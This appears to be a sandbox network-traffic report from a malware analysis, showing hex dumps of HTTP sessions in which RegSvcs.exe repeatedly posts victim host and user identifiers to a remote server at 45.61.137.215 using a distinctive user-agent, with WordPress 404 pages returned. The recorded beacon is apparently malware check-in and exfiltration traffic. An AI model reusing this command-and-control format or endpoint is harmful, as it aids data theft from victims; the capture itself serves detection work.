May 29, 2024 15:42:28.595417976 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:42:28.595432997 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:42:28.595541954 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:28.595556974 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:42:28.595607996 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:42:28.595635891 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:42:28.595663071 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49721	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:28.740547895 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:28.746519089 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:31.195296049 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:29 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:31.195326090 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:42:31.195338011 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:42:31.195364952 CEST	672	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:42:31.195378065 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 29, 2024 15:42:31.195385933 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 29, 2024 15:42:31.195542097 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:31.195563078 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:42:31.195574999 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:42:31.195857048 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49722	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:31.346168041 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:31.351063013 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:33.810412884 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:31 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:33.810427904 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:42:33.810446978 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:42:33.810458899 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:42:33.810468912 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:42:33.810487986 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:42:33.810497999 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:42:33.810503960 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:42:33.810512066 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:42:33.810522079 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49723	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:42:33.985204935 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:42:33.991444111 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:42:36.437865019 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:42:34 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:42:36.437973976 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
